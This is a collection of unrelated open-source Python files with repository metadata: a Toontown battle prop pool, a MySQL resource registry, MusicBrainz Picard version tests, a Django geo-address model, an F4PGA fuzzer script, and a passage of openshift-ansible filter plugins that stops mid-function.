(5, 'big-magnet', 'magnet'),
(5,
'hypno-goggles',
'hypnotize-mod',
'hypnotize-chan'),
(5, 'slideshow', 'av_screen'),
(5,
'banana',
'banana-peel-mod',
'banana-peel-chan'),
(5,
'rake',
'rake-mod',
'rake-chan'),
(5,
'marbles',
'marbles-mod',
'marbles-chan'),
(5,
'tnt',
'tnt-mod',
'tnt-chan'),
(5, 'trapdoor', 'trapdoor'),
(5, 'quicksand', 'quicksand'),
(5, 'traintrack', 'traintrack2'),
(5, 'train', 'train'),
(5, 'megaphone', 'megaphone'),
(5, 'aoogah', 'aoogah'),
(5, 'bikehorn', 'bikehorn'),
(5, 'bugle', 'bugle'),
(5, 'elephant', 'elephant'),
(5, 'fog_horn', 'fog_horn'),
(5, 'whistle', 'whistle'),
(5, 'singing', 'singing'),
(3.5, 'creampie', 'tart'),
(5, 'fruitpie-slice', 'fruit-pie-slice'),
(5, 'creampie-slice', 'cream-pie-slice'),
(5,
'birthday-cake',
'birthday-cake-mod',
'birthday-cake-chan'),
(5, 'wedding-cake', 'wedding_cake'),
(3.5, 'squirting-flower', 'squirting-flower'),
(5,
'glass',
'glass-mod',
'glass-chan'),
(4, 'water-gun', 'water-gun'),
(3.5, 'bottle', 'bottle'),
(5,
'firehose',
'firehose-mod',
'firehose-chan'),
(5, 'hydrant', 'battle_hydrant'),
(4,
'stormcloud',
'stormcloud-mod',
'stormcloud-chan'),
(5, 'geyser', 'geyser'),
(3.5, 'button', 'button'),
(5,
'flowerpot',
'flowerpot-mod',
'flowerpot-chan'),
(5,
'sandbag',
'sandbag-mod',
'sandbag-chan'),
(4,
'anvil',
'anvil-mod',
'anvil-chan'),
(5,
'weight',
'weight-mod',
'weight-chan'),
(5,
'safe',
'safe-mod',
'safe-chan'),
(5,
'piano',
'piano-mod',
'piano-chan'),
(5,
'rake-react',
'rake-step-mod',
'rake-step-chan'),
(5, 'pad', 'pad'),
(4,
'propeller',
'propeller-mod',
'propeller-chan'),
(5,
'calculator',
'calculator-mod',
'calculator-chan'),
(5, 'rollodex', 'roll-o-dex'),
(5, 'rubber-stamp', 'rubber-stamp'),
(5,
'rubber-stamp-pad',
'rubber-stamp-pad-mod',
'rubber-stamp-pad-chan'),
(5,
'smile',
'smile-mod',
'smile-chan'),
(5, 'golf-club', 'golf-club'),
(5, 'golf-ball', 'golf-ball'),
(5, 'redtape', 'redtape'),
(5, 'redtape-tube', 'redtape-tube'),
(5, 'bounced-check', 'bounced-check'),
(5,
'calculator',
'calculator-mod',
'calculator-chan'),
(3.5,
'clip-on-tie',
'clip-on-tie-mod',
'clip-on-tie-chan'),
(5, 'pen', 'pen'),
(5, 'pencil', 'pencil'),
(3.5, 'phone', 'phone'),
(3.5, 'receiver', 'receiver'),
(5, 'sharpener', 'sharpener'),
(3.5, 'shredder', 'shredder'),
(3.5,
'shredder-paper',
'shredder-paper-mod',
'shredder-paper-chan'),
(5, 'watercooler', 'watercooler'),
(5, 'dagger', 'dagger'),
(5, 'card', 'card'),
(5, 'baseball', 'baseball'),
(5, 'bird', 'bird'),
(5, 'can', 'can'),
(5, 'cigar', 'cigar'),
(5, 'evil-eye', 'evil-eye'),
(5, 'gavel', 'gavel'),
(5, 'half-windsor', 'half-windsor'),
(5, 'lawbook', 'lawbook'),
(5, 'newspaper', 'newspaper'),
(5, 'pink-slip', 'pink-slip'),
(5,
'teeth',
'teeth-mod',
'teeth-chan'),
(5, 'power-tie', 'power-tie'),
(3.5, 'spray', 'spray'),
(3.5, 'splash', 'splash'),
(3.5,
'splat',
'splat-mod',
'splat-chan'),
(3.5,
'stun',
'stun-mod',
'stun-chan'),
(3.5, 'glow', 'glow'),
(3.5,
'suit_explosion',
'suit_explosion-mod',
'suit_explosion-chan'),
(3.5, 'suit_explosion_dust', 'dust_cloud'),
(4, 'ripples', 'ripples'),
(4, 'wake', 'wake'),
(4,
'splashdown',
'SZ_splashdown-mod',
'SZ_splashdown-chan'))
CreampieColor = VBase4(250.0 / 255.0, 241.0 / 255.0, 24.0 / 255.0, 1.0)
FruitpieColor = VBase4(55.0 / 255.0, 40.0 / 255.0, 148.0 / 255.0, 1.0)
BirthdayCakeColor = VBase4(253.0 / 255.0, 119.0 / 255.0, 220.0 / 255.0, 1.0)
Splats = {'tart': (0.3, FruitpieColor),
'fruitpie-slice': (0.5, FruitpieColor),
'creampie-slice': (0.5, CreampieColor),
'fruitpie': (0.7, FruitpieColor),
'creampie': (0.7, CreampieColor),
'birthday-cake': (0.9, BirthdayCakeColor)}
Variants = ('tart',
'fruitpie',
'splat-tart',
'dust',
'kapow',
'double-windsor',
'splat-fruitpie-slice',
'splat-creampie-slice',
'splat-fruitpie',
'splat-creampie',
'splat-birthday-cake',
'splash-from-splat',
'clip-on-tie',
'lips',
'small-magnet',
'5dollar',
'10dollar',
'suit_explosion',
'quicksand',
'trapdoor',
'geyser',
'ship',
'trolley',
'traintrack')
class PropPool:
notify = DirectNotifyGlobal.directNotify.newCategory('PropPool')
def __init__(self):
self.props = {}
self.propCache = []
self.propStrings = {}
self.propTypes = {}
self.maxPoolSize = base.config.GetInt('prop-pool-size', 8)
for p in Props:
phase = p[0]
propName = p[1]
modelName = p[2]
if len(p) == 4:
animName = p[3]
propPath = self.getPath(phase, modelName)
animPath = self.getPath(phase, animName)
self.propTypes[propName] = 'actor'
self.propStrings[propName] = (propPath, animPath)
else:
propPath = self.getPath(phase, modelName)
self.propTypes[propName] = 'model'
self.propStrings[propName] = (propPath,)
propName = 'tart'
self.propStrings[propName] = (self.getPath(3.5, 'tart'),)
self.propTypes[propName] = 'model'
propName = 'fruitpie'
self.propStrings[propName] = (self.getPath(3.5, 'tart'),)
self.propTypes[propName] = 'model'
propName = 'double-windsor'
self.propStrings[propName] = (self.getPath(5, 'half-windsor'),)
self.propTypes[propName] = 'model'
splatAnimFileName = self.getPath(3.5, 'splat-chan')
for splat in Splats.keys():
propName = 'splat-' + splat
self.propStrings[propName] = (self.getPath(3.5, 'splat-mod'), splatAnimFileName)
self.propTypes[propName] = 'actor'
propName = 'splash-from-splat'
self.propStrings[propName] = (self.getPath(3.5, 'splat-mod'), splatAnimFileName)
self.propTypes[propName] = 'actor'
propName = 'small-magnet'
self.propStrings[propName] = (self.getPath(5, 'magnet'),)
self.propTypes[propName] = 'model'
propName = '5dollar'
self.propStrings[propName] = (self.getPath(5, '1dollar-bill-mod'), self.getPath(5, '1dollar-bill-chan'))
self.propTypes[propName] = 'actor'
propName = '10dollar'
self.propStrings[propName] = (self.getPath(5, '1dollar-bill-mod'), self.getPath(5, '1dollar-bill-chan'))
self.propTypes[propName] = 'actor'
propName = 'dust'
self.propStrings[propName] = (self.getPath(5, 'dust-mod'), self.getPath(5, 'dust-chan'))
self.propTypes[propName] = 'actor'
propName = 'kapow'
self.propStrings[propName] = (self.getPath(5, 'kapow-mod'), self.getPath(5, 'kapow-chan'))
self.propTypes[propName] = 'actor'
propName = 'ship'
self.propStrings[propName] = ('phase_5/models/props/ship.bam',)
self.propTypes[propName] = 'model'
propName = 'trolley'
self.propStrings[propName] = ('phase_4/models/modules/trolley_station_TT',)
self.propTypes[propName] = 'model'
def getPath(self, phase, model):
return 'phase_%s/models/props/%s' % (phase, model)
def makeVariant(self, name):
if name == 'tart':
self.props[name].setScale(0.5)
elif name == 'fruitpie':
self.props[name].setScale(0.75)
elif name == 'double-windsor':
self.props[name].setScale(1.5)
elif name[:6] == 'splat-':
prop = self.props[name]
scale = prop.getScale() * Splats[name[6:]][0]
prop.setScale(scale)
prop.setColor(Splats[name[6:]][1])
elif name == 'splash-from-splat':
self.props[name].setColor(0.75, 0.75, 1.0, 1.0)
elif name == 'clip-on-tie':
tie = self.props[name]
tie.getChild(0).setHpr(23.86, -16.03, 9.18)
elif name == 'small-magnet':
self.props[name].setScale(0.5)
elif name == 'shredder-paper':
paper = self.props[name]
paper.setPosHpr(2.22, -0.95, 1.16, -48.61, 26.57, -111.51)
paper.flattenMedium()
elif name == 'lips':
lips = self.props[name]
lips.setPos(0, 0, -3.04)
lips.flattenMedium()
elif name == '5dollar':
tex = loader.loadTexture('phase_5/maps/dollar_5.jpg')
tex.setMinfilter(Texture.FTLinearMipmapLinear)
tex.setMagfilter(Texture.FTLinear)
self.props[name].setTexture(tex, 1)
elif name == '10dollar':
tex = loader.loadTexture('phase_5/maps/dollar_10.jpg')
tex.setMinfilter(Texture.FTLinearMipmapLinear)
tex.setMagfilter(Texture.FTLinear)
self.props[name].setTexture(tex, 1)
elif name == 'dust':
bin = 110
for cloudNum in range(1, 12):
cloudName = '**/cloud' + str(cloudNum)
cloud = self.props[name].find(cloudName)
cloud.setBin('fixed', bin)
bin -= 10
elif name == 'kapow':
l = self.props[name].find('**/letters')
l.setBin('fixed', 20)
e = self.props[name].find('**/explosion')
e.setBin('fixed', 10)
elif name == 'suit_explosion':
joints = ['**/joint_scale_POW', '**/joint_scale_BLAM', '**/joint_scale_BOOM']
joint = random.choice(joints)
self.props[name].find(joint).hide()
joints.remove(joint)
joint = random.choice(joints)
self.props[name].find(joint).hide()
elif name == 'quicksand' or name == 'trapdoor':
p = self.props[name]
p.setBin('shadow', -5)
p.setDepthWrite(0)
p.getChild(0).setPos(0, 0, OTPGlobals.FloorOffset)
elif name == 'traintrack' or name == 'traintrack2':
prop = self.props[name]
prop.find('**/tunnel3').hide()
prop.find('**/tunnel2').hide()
prop.find('**/tracksA').setPos(0, 0, OTPGlobals.FloorOffset)
elif name == 'geyser':
p = self.props[name]
s = SequenceNode('geyser')
p.findAllMatches('**/Splash*').reparentTo(NodePath(s))
s.loop(0)
s.setFrameRate(12)
p.attachNewNode(s)
elif name == 'ship':
self.props[name] = self.props[name].find('**/ship_gag')
elif name == 'trolley':
self.props[name] = self.props[name].find('**/trolley_car')
def unloadProps(self):
for p in self.props.values():
if type(p) != type(()):
self.__delProp(p)
self.props = {}
self.propCache = []
def getProp(self, name):
return self.__getPropCopy(name)
def __getPropCopy(self, name):
if self.propTypes[name] == 'actor':
if not self.props.has_key(name):
prop = Actor.Actor()
prop.loadModel(self.propStrings[name][0])
animDict = {}
animDict[name] = self.propStrings[name][1]
prop.loadAnims(animDict)
prop.setName(name)
self.storeProp(name, prop)
if name in Variants:
self.makeVariant(name)
return Actor.Actor(other=self.props[name])
else:
if not self.props.has_key(name):
prop = loader.loadModel(self.propStrings[name][0])
prop.setName(name)
self.storeProp(name, prop)
if name in Variants:
self.makeVariant(name)
return self.props[name].copyTo(hidden)
def storeProp(self, name, prop):
self.props[name] = prop
self.propCache.append(prop)
if len(self.props) > self.maxPoolSize:
oldest = self.propCache.pop(0)
del self.props[oldest.getName()]
self.__delProp(oldest)
self.notify.debug('props = %s' % self.props)
self.notify.debug('propCache = %s' % self.propCache)
def getPropType(self, name):
return self.propTypes[name]
def __delProp(self, prop):
if prop == None:
self.notify.warning('tried to delete null prop!')
return
if isinstance(prop, Actor.Actor):
prop.cleanup()
else:
prop.removeNode()
return
globalPropPool = PropPool()
|
ksmit799/Toontown-Source
|
toontown/battle/BattleProps.py
|
Python
|
mit
| 13,029
|
"""
Resource Registry defines the constants mapping among database types,
drivers, datasources and adapters.
All resources should be registered here in order to locate them by
the resource type.
The resource types are defined first. The registry should have this
format:
REGISTRY = {
RESOURCE_TYPE1 => { ENTRY1 => ( MODULE, CLASS ),
ENTRY2 => ( MODULE, CLASS ),
...
},
RESOURCE_TYPE2 => { ENTRY1 => ( MODULE, CLASS ),
ENTRY2 => ( MODULE, CLASS ),
...
},
}
"""
__version__='$Revision: 117 $'[11:-2]
MYSQL = 'mysql'
RESOURCE_TYPES = [ MYSQL ]
RESOURCE_REGISTRY = {
MYSQL : { '__driver__' : ( 'proof.driver.MySQLConnection', 'MySQLConnection' ),
'__connection__' : ( 'proof.driver.MySQLConnection', 'MySQLConnection' ),
'__pooledconnection__' : ( 'proof.driver.MySQLPooledConnection', 'MySQLPooledConnection' ),
'__datasource__' : ( 'proof.datasource.MySQLDataSource', 'MySQLDataSource' ),
'__pooleddatasource__' : ( 'proof.datasource.MySQLPooledDataSource', 'MySQLPooledDataSource' ),
'__adapter__' : ( 'proof.adapter.MySQLAdapter', 'MySQLAdapter' ) },
}
|
mattduan/proof
|
ProofRegistry.py
|
Python
|
bsd-3-clause
| 1,333
|
# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
#
# Copyright (C) 2013-2014, 2018-2020 Laurent Monin
# Copyright (C) 2017 Sambhav Kothari
# Copyright (C) 2018 Wieland Hoffmann
# Copyright (C) 2018-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
import unittest
from test.picardtestcase import PicardTestCase
from picard import (
api_versions,
api_versions_tuple,
version_from_string,
version_to_string,
)
from picard.version import (
Version,
VersionError,
)
class VersionsTest(PicardTestCase):
def test_version_conversion(self):
versions = (
(Version(1, 1, 0, 'final', 0), '1.1.0.final0'),
(Version(0, 0, 1, 'dev', 1), '0.0.1.dev1'),
(Version(1, 1, 0, 'dev', 0), '1.1.0.dev0'),
(Version(999, 999, 999, 'dev', 999), '999.999.999.dev999'),
(Version(1, 1, 2, 'alpha', 2), '1.1.2.alpha2'),
(Version(1, 1, 2, 'a', 2), '1.1.2.alpha2'),
(Version(1, 1, 2, 'beta', 2), '1.1.2.beta2'),
(Version(1, 1, 2, 'b', 2), '1.1.2.beta2'),
(Version(1, 1, 2, 'rc', 2), '1.1.2.rc2'),
)
for v, s in versions:
self.assertEqual(version_to_string(v), s)
self.assertEqual(str(v), s)
self.assertEqual(v, Version.from_string(s))
self.assertEqual(v, version_from_string(s))
def test_version_conversion_short(self):
versions = (
(Version(1, 1, 0, 'final', 0), '1.1'),
(Version(1, 1, 1, 'final', 0), '1.1.1'),
(Version(0, 0, 1, 'dev', 1), '0.0.1.dev1'),
(Version(1, 1, 0, 'dev', 0), '1.1.0.dev0'),
(Version(1, 1, 2, 'alpha', 2), '1.1.2a2'),
(Version(1, 1, 2, 'a', 2), '1.1.2a2'),
(Version(1, 1, 2, 'beta', 2), '1.1.2b2'),
(Version(1, 1, 2, 'b', 2), '1.1.2b2'),
(Version(1, 1, 2, 'rc', 2), '1.1.2rc2'),
)
for v, s in versions:
self.assertEqual(version_to_string(v, short=True), s)
self.assertEqual(v.to_string(short=True), s)
self.assertEqual(v, Version.from_string(s))
self.assertEqual(v, version_from_string(s))
def test_version_to_string_invalid_identifier(self):
invalid = (1, 0, 2, 'xx', 0)
self.assertRaises(VersionError, version_to_string, (invalid))
def test_version_from_string_underscores(self):
l, s = (1, 1, 0, 'dev', 0), '1_1_0_dev_0'
self.assertEqual(l, version_from_string(s))
def test_version_from_string_prefixed(self):
l, s = (1, 1, 0, 'dev', 0), 'anything_28_1_1_0_dev_0'
self.assertEqual(l, version_from_string(s))
def test_version_single_digit(self):
l, s = (2, 0, 0, 'final', 0), '2'
self.assertEqual(l, version_from_string(s))
self.assertEqual(l, Version(2))
def test_version_from_string_invalid(self):
invalid = 'anything_28x_1_0_dev_0'
self.assertRaises(VersionError, version_to_string, (invalid))
def test_version_from_string_prefixed_final(self):
l, s = (1, 1, 0, 'final', 0), 'anything_28_1_1_0'
self.assertEqual(l, version_from_string(s))
def test_from_string_invalid_identifier(self):
self.assertRaises(VersionError, version_from_string, '1.1.0dev')
self.assertRaises(VersionError, version_from_string, '1.1.0devx')
def test_version_from_string_invalid_partial(self):
self.assertRaises(VersionError, version_from_string, '1dev')
self.assertRaises(VersionError, version_from_string, '1.0dev')
self.assertRaises(VersionError, version_from_string, '123.')
@unittest.skipUnless(len(api_versions) > 1, "api_versions do not have enough elements")
def test_api_versions_1(self):
"""Check api versions format and order (from oldest to newest)"""
for i in range(len(api_versions) - 1):
a = version_from_string(api_versions[i])
b = version_from_string(api_versions[i+1])
self.assertLess(a, b)
@unittest.skipUnless(len(api_versions_tuple) > 1, "api_versions_tuple do not have enough elements")
def test_api_versions_tuple_1(self):
"""Check api versions format and order (from oldest to newest)"""
for i in range(len(api_versions_tuple) - 1):
a = api_versions_tuple[i]
b = api_versions_tuple[i+1]
self.assertLess(a, b)
def test_version_invalid_new(self):
self.assertRaises(VersionError, Version, '1', 'a')
self.assertRaises(VersionError, Version, None, 0)
self.assertRaises(VersionError, Version, 1, 0, 0, 'final', None)
self.assertRaises(VersionError, Version, 1, 0, 0, 'invalid', 0)
def test_sortkey(self):
self.assertEqual((2, 1, 3, 4, 2), Version(2, 1, 3, 'final', 2).sortkey)
self.assertEqual((2, 0, 0, 1, 0), Version(2, 0, 0, 'a', 0).sortkey)
self.assertEqual((2, 0, 0, 1, 0), Version(2, 0, 0, 'alpha', 0).sortkey)
def test_lt(self):
v1 = Version(2, 3, 0, 'dev', 1)
v2 = Version(2, 3, 0, 'alpha', 1)
self.assertLess(v1, v2)
self.assertFalse(v2 < v2)
v1 = Version(2, 3, 0, 'final', 1)
v2 = Version(2, 10, 0, 'final', 1)
self.assertLess(v1, v2)
def test_le(self):
v1 = Version(2, 3, 0, 'dev', 1)
v2 = Version(2, 3, 0, 'alpha', 1)
self.assertLessEqual(v1, v2)
self.assertLessEqual(v2, v2)
def test_gt(self):
v1 = Version(2, 3, 0, 'alpha', 1)
v2 = Version(2, 3, 0, 'dev', 1)
self.assertGreater(v1, v2)
self.assertFalse(v2 > v2)
def test_ge(self):
v1 = Version(2, 3, 0, 'alpha', 1)
v2 = Version(2, 3, 0, 'dev', 1)
self.assertGreaterEqual(v1, v2)
self.assertGreaterEqual(v2, v2)
def test_eq(self):
v1 = Version(2, 3, 0, 'alpha', 1)
v2 = Version(2, 3, 0, 'a', 1)
v3 = Version(2, 3, 0, 'final', 1)
self.assertEqual(v1, v1)
self.assertEqual(v1, v2)
self.assertFalse(v1 == v3)
def test_ne(self):
v1 = Version(2, 3, 0, 'alpha', 1)
v2 = Version(2, 3, 0, 'a', 1)
v3 = Version(2, 3, 0, 'final', 1)
self.assertFalse(v1 != v1)
self.assertFalse(v1 != v2)
self.assertTrue(v1 != v3)
|
metabrainz/picard
|
test/test_versions.py
|
Python
|
gpl-2.0
| 7,014
|
# --coding: utf8--
import requests
from django.contrib.gis.db import models
from django.contrib.gis.geos import GEOSGeometry
class Country(models.Model):
"""
Модель страны.
"""
title = models.CharField(
u'название', max_length=255)
class Meta:
verbose_name = u'страна'
verbose_name_plural = u'страны'
ordering = ['title']
def __unicode__(self):
return self.title
class BaseAddress(models.Model):
"""
Базовый класс адреса с ГЕО данными.
"""
country = models.ForeignKey(
Country,
verbose_name=u'страна')
area = models.CharField(
u'область', max_length=255, blank=True)
subarea = models.CharField(
u'район', max_length=255, blank=True)
locality = models.CharField(
u'населенный пункт', max_length=255)
street = models.CharField(
u'улица', max_length=255, blank=True)
house = models.CharField(
u'дом', max_length=50, blank=True)
apartment = models.CharField(
u'офис', max_length=10, blank=True)
zip = models.CharField(
u'почтовый индекс', max_length=10, blank=True)
coordinates = models.PointField(
u'координаты', blank=True, null=True) # широта долгота
# Используем GeoManager, чтобы делать ГЕО запросы
objects = models.GeoManager()
class Meta:
verbose_name = u'адрес'
verbose_name_plural = u'адреса'
def __unicode__(self):
return ', '.join(part for part in [self.zip, self.country.title,
self.area, self.subarea,
self.locality, self.street,
self.house] if part)
def fetch_coordinates(self):
"""
Запрос координатов объекта с Яндекса.
"""
query = ',+'.join(
part for part in [self.country.title, self.area, self.subarea,
self.locality, self.street, self.house] if part)
url = u'http://geocode-maps.yandex.ru/1.x/?geocode=%s&format=json' % (
query)
try:
r = requests.get(url).json()
except requests.exceptions.RequestException:
return None
try:
longitude, latitude = (r['response']['GeoObjectCollection']
['featureMember'][0]['GeoObject']['Point']
['pos']).split(' ')
return GEOSGeometry(U'POINT(%s %s)' % (longitude, latitude))
except (KeyError, IndexError):
return None
def get_short_address(self):
return ', '.join(part for part in [self.area, self.locality] if part)
class Region(models.Model):
"""
Класс для географического региона.
"""
name = models.CharField(u'название', max_length=255)
coordinates = models.PolygonField(u'координаты')
# Используем GeoManager, чтобы делать ГЕО запросы
objects = models.GeoManager()
class Meta:
verbose_name = u'регион'
verbose_name_plural = u'регионы'
ordering = ['name']
def __unicode__(self):
return self.name
|
minidron/django-geoaddress
|
django_geoaddress/models.py
|
Python
|
gpl-2.0
| 3,479
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020-2022 F4PGA Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
import os
import random
random.seed(int(os.getenv("SEED"), 16))
from utils.spec import io_base_address
if __name__ == '__main__':
io_base_address.run('HDIO_BOT_RIGHT')
|
SymbiFlow/prjuray
|
fuzzers/002-tilegrid/hdio_bot_right/top.py
|
Python
|
isc
| 845
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# pylint: disable=too-many-lines
"""
Custom filters for use in openshift-ansible
"""
import ast
import json
import os
import pdb
import random
from base64 import b64encode
from collections import Mapping
# pylint no-name-in-module and import-error disabled here because pylint
# fails to properly detect the packages when installed in a virtualenv
from distutils.util import strtobool # pylint:disable=no-name-in-module,import-error
from operator import itemgetter
import yaml
from ansible import errors
from ansible.parsing.yaml.dumper import AnsibleDumper
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six import iteritems, string_types, u
# pylint: disable=import-error,no-name-in-module
from ansible.module_utils.six.moves.urllib.parse import urlparse
HAS_OPENSSL = False
try:
import OpenSSL.crypto
HAS_OPENSSL = True
except ImportError:
pass
# pylint: disable=C0103
def lib_utils_oo_pdb(arg):
""" This pops you into a pdb instance where arg is the data passed in
from the filter.
Ex: "{{ hostvars | lib_utils_oo_pdb }}"
"""
pdb.set_trace()
return arg
def get_attr(data, attribute=None):
""" This looks up dictionary attributes of the form a.b.c and returns
the value.
If the key isn't present, None is returned.
Ex: data = {'a': {'b': {'c': 5}}}
attribute = "a.b.c"
returns 5
"""
if not attribute:
raise errors.AnsibleFilterError("|failed expects attribute to be set")
ptr = data
for attr in attribute.split('.'):
if attr in ptr:
ptr = ptr[attr]
else:
ptr = None
break
return ptr
def oo_flatten(data):
""" This filter plugin will flatten a list of lists
"""
if not isinstance(data, list):
raise errors.AnsibleFilterError("|failed expects to flatten a List")
return [item for sublist in data for item in sublist]
def lib_utils_oo_collect(data_list, attribute=None, filters=None):
""" This takes a list of dict and collects all attributes specified into a
list. If filter is specified then we will include all items that
match _ALL_ of filters. If a dict entry is missing the key in a
filter it will be excluded from the match.
Ex: data_list = [ {'a':1, 'b':5, 'z': 'z'}, # True, return
{'a':2, 'z': 'z'}, # True, return
{'a':3, 'z': 'z'}, # True, return
{'a':4, 'z': 'b'}, # FAILED, obj['z'] != obj['z']
]
attribute = 'a'
filters = {'z': 'z'}
returns [1, 2, 3]
This also deals with lists of lists with dict as elements.
Ex: data_list = [
[ {'a':1, 'b':5, 'z': 'z'}, # True, return
{'a':2, 'b':6, 'z': 'z'} # True, return
],
[ {'a':3, 'z': 'z'}, # True, return
{'a':4, 'z': 'b'} # FAILED, obj['z'] != obj['z']
],
{'a':5, 'z': 'z'}, # True, return
]
attribute = 'a'
filters = {'z': 'z'}
returns [1, 2, 3, 5]
"""
if not isinstance(data_list, list):
raise errors.AnsibleFilterError("lib_utils_oo_collect expects to filter on a List")
if not attribute:
raise errors.AnsibleFilterError("lib_utils_oo_collect expects attribute to be set")
data = []
retval = []
for item in data_list:
if isinstance(item, list):
retval.extend(lib_utils_oo_collect(item, attribute, filters))
else:
data.append(item)
if filters is not None:
if not isinstance(filters, dict):
raise errors.AnsibleFilterError(
"lib_utils_oo_collect expects filter to be a dict")
retval.extend([get_attr(d, attribute) for d in data if (
all([get_attr(d, key) == filters[key] for key in filters]))])
else:
retval.extend([get_attr(d, attribute) for d in data])
retval = [val for val in retval if val is not None]
return retval
def lib_utils_oo_select_keys_from_list(data, keys):
""" This returns a list, which contains the value portions for the keys
Ex: data = { 'a':1, 'b':2, 'c':3 }
keys = ['a', 'c']
returns [1, 3]
"""
if not isinstance(data, list):
raise errors.AnsibleFilterError("|lib_utils_oo_select_keys_from_list failed expects to filter on a list")
if not isinstance(keys, list):
raise errors.AnsibleFilterError("|lib_utils_oo_select_keys_from_list failed expects first param is a list")
# Gather up the values for the list of keys passed in
retval = [lib_utils_oo_select_keys(item, keys) for item in data]
return oo_flatten(retval)
def lib_utils_oo_select_keys(data, keys):
""" This returns a list, which contains the value portions for the keys
Ex: data = { 'a':1, 'b':2, 'c':3 }
keys = ['a', 'c']
returns [1, 3]
"""
if not isinstance(data, Mapping):
raise errors.AnsibleFilterError("|lib_utils_oo_select_keys failed expects to filter on a dict or object")
if not isinstance(keys, list):
raise errors.AnsibleFilterError("|lib_utils_oo_select_keys failed expects first param is a list")
# Gather up the values for the list of keys passed in
retval = [data[key] for key in keys if key in data]
return retval
def lib_utils_oo_prepend_strings_in_list(data, prepend):
""" This takes a list of strings and prepends a string to each item in the
list
Ex: data = ['cart', 'tree']
prepend = 'apple-'
returns ['apple-cart', 'apple-tree']
"""
if not isinstance(data, list):
raise errors.AnsibleFilterError("|failed expects first param is a list")
if not all(isinstance(x, string_types) for x in data):
raise errors.AnsibleFilterError("|failed expects first param is a list"
" of strings")
retval = [prepend + s for s in data]
return retval
def lib_utils_oo_dict_to_list_of_dict(data, key_title='key', value_title='value'):
"""Take a dict and arrange them as a list of dicts
Input data:
{'region': 'infra', 'test_k': 'test_v'}
Return data:
[{'key': 'region', 'value': 'infra'}, {'key': 'test_k', 'value': 'test_v'}]
Written for use of the oc_label module
"""
if not isinstance(data, dict):
# pylint: disable=line-too-long
raise errors.AnsibleFilterError("|failed expects first param is a dict. Got %s. Type: %s" % (str(data), str(type(data))))
rval = []
for label in data.items():
rval.append({key_title: label[0], value_title: label[1]})
return rval
def oo_ami_selector(data, image_name):
""" This takes a list of amis and an image name and attempts to return
the latest ami.
"""
if not isinstance(data, list):
raise errors.AnsibleFilterError("|failed expects first param is a list")
if not data:
return None
else:
if image_name is None or not image_name.endswith('_*'):
ami = sorted(data, key=itemgetter('name'), reverse=True)[0]
return ami['ami_id']
else:
ami_info = [(ami, ami['name'].split('_')[-1]) for ami in data]
ami = sorted(ami_info, key=itemgetter(1), reverse=True)[0][0]
return ami['ami_id']
def lib_utils_oo_split(string, separator=','):
""" This splits the input string into a list. If the input string is
already a list we will return it as is.
"""
if isinstance(string, list):
return string
return string.split(separator)
def lib_utils_oo_dict_to_keqv_list(data):
"""Take a dict and return a list of k=v pairs
Input data:
{'a': 1, 'b': 2}
Return data:
['a=1', 'b=2']
"""
if not isinstance(data, dict):
try:
# This will attempt to convert something that looks like a string
# representation of a dictionary (including json) into a dictionary.
data = ast.literal_eval(data)
except ValueError:
msg = "|failed expects first param is a dict. Got {}. Type: {}"
msg = msg.format(str(data), str(type(data)))
raise errors.AnsibleFilterError(msg)
return ['='.join(str(e) for e in x) for x in data.items()]
def lib_utils_oo_list_to_dict(lst, separator='='):
""" This converts a list of ["k=v"] to a dictionary {k: v}.
"""
kvs = [i.split(separator) for i in lst]
return {k: v for k, v in kvs}
def haproxy_backend_masters(hosts, port):
""" This takes an array of dicts and returns an array of dicts
to be used as a backend for the haproxy role
"""
servers = []
for idx, host_info in enumerate(hosts):
server = dict(name="master%s" % idx)
server_ip = host_info['openshift']['common']['ip']
server['address'] = "%s:%s" % (server_ip, port)
server['opts'] = 'check'
servers.append(server)
return servers
# pylint: disable=too-many-branches, too-many-nested-blocks
def lib_utils_oo_parse_named_certificates(certificates, named_certs_dir, internal_hostnames):
""" Parses names from list of certificate hashes.
Ex: certificates = [{ "certfile": "/root/custom1.crt",
"keyfile": "/root/custom1.key",
"cafile": "/root/custom-ca1.crt" },
{ "certfile": "custom2.crt",
"keyfile": "custom2.key",
"cafile": "custom-ca2.crt" }]
returns [{ "certfile": "/etc/origin/master/named_certificates/custom1.crt",
"keyfile": "/etc/origin/master/named_certificates/custom1.key",
"cafile": "/etc/origin/master/named_certificates/custom-ca1.crt",
"names": [ "public-master-host.com",
"other-master-host.com" ] },
{ "certfile": "/etc/origin/master/named_certificates/custom2.crt",
"keyfile": "/etc/origin/master/named_certificates/custom2.key",
"cafile": "/etc/origin/master/named_certificates/custom-ca-2.crt",
"names": [ "some-hostname.com" ] }]
"""
if not isinstance(named_certs_dir, string_types):
raise errors.AnsibleFilterError("|failed expects named_certs_dir is str or unicode")
if not isinstance(internal_hostnames, list):
raise errors.AnsibleFilterError("|failed expects internal_hostnames is list")
if not HAS_OPENSSL:
raise errors.AnsibleFilterError("|missing OpenSSL python bindings")
for certificate in certificates:
if 'names' in certificate.keys():
continue
else:
certificate['names'] = []
if not os.path.isfile(certificate['certfile']) or not os.path.isfile(certificate['keyfile']):
raise errors.AnsibleFilterError("|certificate and/or key does not exist '%s', '%s'" %
(certificate['certfile'], certificate['keyfile']))
try:
st_cert = open(certificate['certfile'], 'rt').read()
cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, st_cert)
